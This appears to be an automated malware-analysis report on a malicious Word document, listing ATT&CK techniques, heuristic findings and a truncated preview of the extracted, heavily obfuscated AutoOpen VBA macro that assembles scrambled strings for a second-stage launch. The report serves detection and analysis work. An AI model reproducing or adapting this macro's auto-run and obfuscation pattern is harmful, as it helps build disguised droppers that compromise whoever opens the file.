MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains a legacy WordBasic AutoOpen macro, which is a known indicator of malicious documents. The VBA code is heavily obfuscated and truncated, but the presence of a Shell() call suggests it attempts to execute a second-stage payload. The macro's obfuscation and the large slack space in the OLE structure are suspicious. The document is likely delivered as a spearphishing attachment.
Heuristics 6
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 116,736 bytes but its declared streams total only 32,741 bytes — 83,995 bytes (72%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16714 bytes |
SHA-256: 35ea573d1f611a4957750d3ec241a6c30b50d5666ed99999478bf42884c7d049 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "nHawNUvzilwUu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
If Jwvvjn = Zjsuq Then
Dim JnTsr()
jXdET = tLUON + VGTzvB + YqoBo + oHVZYa
zJwZjs = kmbBKT + YjDJr
End If
If SMrVpY Or 12 Then
Dim EXmwnT()
LKuTDZ = lPmqUi + XSPjJ + jwEDq + zjPpF
End If
If wUuHaw >= TiCif Then
Dim dZmSf()
Cwirw = dCImvj + zjjjP
szJFi = aUYiz + jLumqN
End If
If uDwTSN <= 5 Then
Dim PCLXY()
zcNhv = XNqJPG + GKuwM
qbbOE = rLmBMn + bNWwUR
End If
If NZJqo <> AhzFiU Then
Dim PjFWPi()
IPFqc = cwWZjT + RCwJZ + QOzzzY + ZhzJT
End If
VJoaIrcvQAd (mfqmc + CHXCLI + jMsfAL + rRawNjKwWV + NajchIn + vDUfNBLRR + CzLKtSz + fRKEGd + OvCHpLr + iEtiMA + UDzRhjXO)
If fkZkjO Eqv nAqiv Then
Dim cktjLl()
mdlrzm = fvCol + qOwWm + fENfSI + wKwUB
uhuBzi = tqmswC + pGOoWu + GhZzT + soNjaB
End If
If ElkMd <= ofEjO Then
Dim jzkYwW()
VSqEs = JoJuiw + LPKkhR
XthwXj = WBjImB + njOhsj
End If
End Sub
Attribute VB_Name = "YvMwozGoSVhPO"
Function mfqmc()
If dqbUq And dcwbI Then
Dim KMBDZD()
zlzDY = BDqhXp + dROscV + jnjjS + lIohl
lMjcj = CZpImv + mOFtz + bDwqJ + QlKJs
End If
If jLRDw <= HnpqE Then
Dim GOBVOz()
wuPVFZ = EffHf + jDpzvQ + duWUT + iojpl
End If
snDsw = "`ja ,S[7,@ [p[b[q >S" + ":[Y[l[b[ [M[" + "'[U[ [Ps[E[ [G["
If jlLPL Eqv 17 Then
Dim NTEhj()
jWnzw = WIcWI + JENMGw
mSVtOw = Vksvw + aJkma + GtGVw + cOFHL
End If
If PEhwoi >= ZwRaA Then
Dim HjzjOq()
KEoVX = PBrPwt + AJhhJF + DBHfQ + OJFLd
End If
FYuiDEtXdW = "i[B[ [)[$[r[ [1[n[" + "#[ [q`[P[ [" + "y[Z[U[ [{[" + "W[G[ [Y[]@["
If TjFYJB And azUEP Then
Dim orFmkO()
SONGm = mOTiMY + jVquvR + iOpLsI + wtGbpc
End If
If BtDLc >= 11 Then
Dim zfwmQ()
XoWAUb = upmfwY + mkMOZr
End If
lJZXsjXl = " [B[Z[3[ [?[_O[ [" + "y[8%[ [R[8[" + "L[ [_Y[F[ [" + "8[ [j[ [E[m[*[ 2[gs"
mfqmc = snDsw + FYuiDEtXdW + lJZXsjXl
If dwIwLi Eqv BKuXBl Then
Dim kqtUw()
QKYap = RHAiHO + wBDzw
End If
If JMQUbJ Xor cOiDIo Then
Dim VfRhWc()
zcnim = LQWGfO + qkjib
zjPnSt = ZUGpc + WcLkdl
End If
If TMrYXt <= 9 Then
Dim okwmG()
flioVp = CqKhdA + nizFsm + iUYPuz + ljKCWl
End If
If TfQkIF < buJjkh Then
Dim CdQhO()
zzzwC = cJdSVB + EplHKB
End If
If SzmMP < HPHjRJ Then
Dim BLqSi()
EZCOdH = VNGXvj + QXvJE + kGZDL + ffsukW
End If
End Function
Function CHXCLI()
nIZOdZ = "[z`[y[f[zK[;[b[x[j[" + "v[F[e[.N[e`[y[([x[q" + "[d[H[b[^%3[W`@[ " + "[t[z&[ds[8['[([m[h" + "[m[6[f[^s@[>[b[2[fko" + "[{[4[X[_+[^[u[8" + """" + "V"
OzilScHiiVE = "[F[ACO[I[q[0[" + "A[;[>[8[2[" + "([![c[3[*[ " + "[w[B[![j[b[RX" + "[b[W[p[)[q[?[]["
wWnGB = "+[F[R[_[4[" + "*['[)[A[bS[W,[h" + "[5[:[I[lE[P" + "[vs[n[Y[Pk" + "[gS[tF[d,[7[8[n[i["
nlGSRLuvz = "4&o[/[^[A[Q" + "[([4[q[Q[Y[{[>[6[][" + "3[!6[R[\[ [N[:[/[" + ")[^[6,[V[)[f[M[a[" + "A[Gl[>[)[x[Y[!K[5V%[" + "P?[v[bI[N`[i-"
If HCval Xor 18 Then
Dim kNzVCr()
lHcMZ = DfpCzb + jdnDMm
End If
If YwjGst < 12 Then
Dim zDWbb()
JwlUqA = OzlJZ + OqphD + wjpYKo + dbIGaw
End If
If COBGrh >= iYNXjU Then
Dim ZIWSff()
TYafA = uGsKM + YMbnaM + wARKn + VwBzk
RKniq = aqKFbf + KwvSw + vFRiL + NnXiY
End If
If OZWMUJ Xor jqSZBc Then
Dim ldQjN()
ruiWr = KzXRu + Lnaih
End If
If SNUWz Eqv bwTIBm Then
Dim aTXhGS()
UBfnJ = oIhsz + hwwwEE
tpIjVF = JWifQp + EhRij + zKTRa + IEsbW
End If
WIYWEZEi = "[2[4[f[M[2[ [" + "Cc[xo[a[I[^[a[" + "^[=U[A[l[2["
If YcGYwu >= 6 Then
Dim BaBMN()
pYpNVM = fkdiU + kkJio + DzTJR + OddWrr
bFikT = oIXQo + cDXJTr
End If
If vKcWO Eqv iGikI Then
Dim lPtUFz()
PzIjjf = pfrUK + ziTRcI + uoham + vNMJC
End If
If zDXhK Or 8 Then
Dim UhkvD()
WFKHF = SOzlpv + mYHLYh + Stbph + JJjKU
End If
If BPVKo = HvkOq Then
Dim RFKKEs()
bSzvwJ = HZwJQi + NGNqP + qXuSkk + PXdsHu
tFBUX = rFhza + MiEzwU
End If
YBIcsqShi = ";[a[i[.[{[Xk[B[b
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.